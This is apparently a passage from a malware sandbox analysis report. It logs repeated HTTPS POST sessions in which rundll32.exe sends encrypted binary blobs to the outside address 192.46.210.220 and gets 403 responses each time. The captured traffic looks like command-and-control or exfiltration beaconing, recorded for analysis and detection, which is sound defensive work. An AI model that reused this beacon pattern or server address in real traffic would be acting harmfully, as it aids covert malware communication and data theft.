                                                                                                              2021-10-28 02:49:10 UTC20OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:10 UTC24INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:10 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              40192.168.2.449953192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:22 UTC199OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:22 UTC199OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:23 UTC209INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:22 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              41192.168.2.449954192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:22 UTC204OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:22 UTC204OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:23 UTC209INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:23 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              42192.168.2.449961192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:26 UTC209OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:26 UTC209OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:26 UTC219INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:26 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              43192.168.2.449962192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:26 UTC214OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:26 UTC214OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:26 UTC219INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:26 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              44192.168.2.449971192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:30 UTC219OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:30 UTC219OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:30 UTC229INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:30 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              45192.168.2.449972192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:30 UTC224OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:30 UTC224OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:30 UTC229INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:30 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              46192.168.2.449997192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:33 UTC229OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:33 UTC229OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:34 UTC239INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:34 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              47192.168.2.449999192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:34 UTC234OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:34 UTC234OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:34 UTC239INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:34 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              48192.168.2.450021192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:37 UTC239OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:37 UTC239OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:38 UTC249INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:38 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              49192.168.2.450023192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:37 UTC244OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:37 UTC244OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:38 UTC249INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:38 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              5192.168.2.449801192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:10 UTC24OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:10 UTC25OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:11 UTC29INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:11 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              50192.168.2.450033192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:41 UTC249OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:41 UTC249OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:42 UTC259INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:42 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              51192.168.2.450034192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:41 UTC254OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
